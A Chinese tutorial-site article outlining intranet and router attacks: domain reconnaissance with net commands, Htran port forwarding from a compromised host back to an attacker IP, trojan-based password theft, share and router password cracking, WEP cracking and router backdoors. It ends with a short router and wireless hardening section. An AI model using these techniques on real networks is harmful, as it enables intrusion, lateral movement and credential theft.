盘绰网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

打破隔离,不同环境中的网络设备攻击

时间:2023/8/5作者:未知来源:盘绰网教程人气:


[摘要]网络分布与构造 "工作组"与"域" "工作组"是将不同的计算机按功能分别列入不同的组中,以方便管理。 "域"...

网络分布与构造

"工作组"与"域"

"工作组"是将不同的计算机按功能分别列入不同的组中,以方便管理。

"域"指的是服务器所控制的网络上的计算机能否加入的计算机组合。

域的建立与控制

1.服务器建立与控制

在组建windows域结构网络时,必须建立域控制器。

2.客户端设置

VLAN(虚拟局域网)

虚拟局域网是一种通过局域网内的设备逻辑地而不是物理地划分为一个个网段,从而实现虚拟工作组的新兴技术。

1.基于端口的VLAN

VLAN从逻辑上把局域网交换机的端口划分出来,从而把终端系统划分为不同的部分,各部分相对独立,在功能上模拟了传统的局域网。

2.基于MAC地址的VLAN

基于MAC地址的VLAN是用终端系统的MAC地址定义的VLAN。

3.基于路由的VLAN

路由协议工作在网络层,该方式允许一个VLAN跨越多个交换机,或一个端口位于多个VLAN中。

4.基于策略的VLAN

网络分析与渗透方案法人确定

命令行下的网络信息刺探

网络结构

net view

查看域或工作的信息

ipconfig /all 在返回的信息中,"Node Type"表示节点类型信息,NetBIOS的节点类型主要用来表明某计算机节点解析计算机名称及地址的方法。

B节点只使用广播方法。 该类型的节点在本地子网上使用广播消息来发现位于同一子网中的计算机。

P节点只和名称服务器使用点对点通信。 该类型的节点使用服务进行查询以获得要解析的地址。

M节点先使用广播,再点对点通信。 该类型的节点在LAN上发送广播消息来查找另一台计算机,如果没找到则转为使用P节点方式继续查询。

H节点先使用点对点通信,然后使用广播。 该类型的节点先使用NetBIOS名称解析服务来进行注册或者解析。 无法连接则转为使用B节点。

域角色信息

先查获本机在域中的角色net localgroup adminnistrators 再查看域用户名单 net user /domain

获得域用户名单后,需要查看这些名单哪些用户是域管理员。 net group "domain admins"/domain 要查看某个域管理员状态 net user adam /domain

一些常用的网络渗透命令

1.net group 管理域中的全局组

2.net view 显示共享资源

3.net accounts用户帐号数据库管理

4.net session管理服务器计算机连接

5.net file显示服务器上打开的共享文件名称

6.net computer域计算机管理

7.net localgroup管理本地组

信息利用与手法绑定

渗透基础 所有的后续入侵操作,都是建立在内网主机连接的基础上。

渗透思路

渗透方案

首先,内网远程溢出是一个很重要的网络渗透攻击方式。

其次,内网的弱口令扫描刺探也是狠重要的入侵利用方式。

另外,内网嗅探,ARP欺骗会话劫持都是狠有效的方法。

端口转发与代理,内网潜入的基础

被误用的端口转发

端口转发是一个网络端口从一个网络节点到另一个网络节点的行为,使一个外部用户经过一个被激活的NAT路由到达一个在私有内部IP上的端口。

“肉鸡”变跳板,Htran端口转发

Htran端口转发建代理 Htran是一个功能狠强大的端口转发工具。

1.安装端口转发服务

首先,攻击者先将"Htran"工具通过远程溢出上传到远程被控制的主机上。 执行安装命令htran20.exe -install 再执行htran20.exe -start

2.本机端口监听

htran20.exe -s -listen 800 8888

3.远程主机端口转发

htran20.exe -s -connet 202.172.98.198 800 执行命令后,被入侵控制的远程主机就会自动连接到攻击者所在本地IP的800端口。

4.代理建立成功

代理连接,进入内网

攻击者在本地运行"SocksCap V2.38"的socks代理工具,是远程被入侵的主机成功代理跳板,成功入侵内网。

SocksCap让任意工具使用代理

X-Scan扫描到内网

渗透内网,文件共享攻击实例

1.手工渗透内网共享

假设通过X-Scan扫描器,扫描到远程主机的内部网络中有一些主机开启了文件共享,选择其中的IP地址作为攻击目标。

2.Shed扫描内网共享机密

Shed是一个共享资源扫描工具,攻击者利用它可以通过端口转发建立代理,直接从本地主机扫描远程主机内部网络中共享资源并进行访问。

3。 局域网超级渗透工具NetSuper

NetSuper是一个内部局域网共享资源扫描与破解工具

4.破解共享破密的工具-SMB Scanner

木马与终端,助攻击者渗透内网

远程终端跳板渗透

木马渗透内网

"上兴远程控制"是一款功能强大的远程控制软件。

1.配置服务端,内网连接

2.远程连接控制

3.盗密码,渗内网

4.开启渗透代理

5.远程控制与命令行下的渗透

路由,打开内网渗透的通道

路由器的安全隐患

路由器的工作原理

路由器的核心作用是实现网络互连,每个路由器中都存在一个路由表,路由表为路由器存储了到达网络上任一目的所需要的一切信息。

路由器配置方式与攻击入口

路与器的配置有很多种,主要有本地Console端口配置,Telnet远程登录配置,ftp配置,远程拨号配置

带路由的ADSL攻击漏洞

无线路由的安全软肋

Cisco路由器攻击案例

1.寻找有漏洞的Csico路由器

路由器的远程控制方法有两种:一种是Telnet,二是SNMP代理 第二种控制方式是通过在路由器上配置好SNMP代理,包括MIB变量访问,MIB变量设置,SNMP中断和SNMP团体字符串。

工具"SolarWinds 2002",如果扫描到private权限的Cisco路由器,就可以通过专门的下载路由器的配置文件。 然后通过查看配置文件可以看到Console以及Vty的登陆密码。

2.下载配置文件

3.获取控制密码

4.偷梁换柱,替换特权密码

5.SolarWinds 2002功能列表

路由器登录密码的暴力破解

1.扫描路由器web配置页面

2.无限制破解路由器密码

web密码砸门器 webCracker强求破解http://www.arpun.com/soft/19208.html GoldenEye破解路由密码

3.ADSL MODEM的路由攻击破解

x-scan扫描破解ADSL MODERM路由器密码

ADSL密码终结者 指定攻击IP地址 设置扫描选项 快速破解

无线路由的WEP破解http://www.arpun.com/article/8624.html

1.SSID信息搜索与探测

"WinAircrackPack"工具,扫描检测出无线网络的SSID号和频段

2.更新嗅探驱动

3.SSID破解

4.破解无线网络密钥

路由器渗透与利用

1.NAT端口映射,路由器渗透内网

对于入侵者,直接访问路由器IP地址,只能连接路由器设备上,要渗透入侵内网中的主机,唯有在路由器上进行端口映射操作,从而将连接转向到内网主机的某个端口。

专业路由器NAT设置

show arp terminal history size 0

ADSL路由的端口映射

2.DDOS攻击,拒绝服务

路由器的网络过滤攻击

路由器破坏升级

3.路由变"武器库"与入侵跳板

攻击者在入侵控制路由器后,甚至可以在路由器中存储自己的木马后门或者其他攻击工具,或者将路由器作为入侵的跳板,隐藏自己的IP地址。

路由存后门

路由器作为跳板

截断通道,掐住内网入侵的命脉

限制代理上网,阻止内网突破

"亿特上网管理专家"的安装与设置

添加控制策略,禁用代理上网

创建上网用户帐号,指派控制策略

路由安全配置手册

路由安全配置的原则

1.登录最小权限原则

2.强壮与加密的口令密码

3.路由器访问控制

4.禁止路由信息外泄

ACL访问控制列表,控制VTY终端连接

Cisco路由器的几条安全配置命令

1.路由内置服务设置

2.端口安全配置

3.Telnet系统登录认证

4.Vty登录认证设置

5.SNMP配置及安全

6.Cisco的安全配置模板

ADSL MODERN的简单保护

修改默认路由密码

控制远程连接

无线路由安全设置

1.无线网络安全设置要点

首先,要关闭SSID广播

其次,要严格设置WEP和WPA安全加密功能

另外,建立MAC地址方式的访问控制列表

最后,关闭计算机的Ad-hoc方式接入功能

无线路由安全配置实例

Internet网络连接设置

更改无线网络标示

无线路由加密模式

关闭SSID广播

设置MAC控制列表


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

关键词:  打破隔离  不同环境中的网络设备攻击





Copyright © 2012-2018 盘绰网教程(http://www.panchuo.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版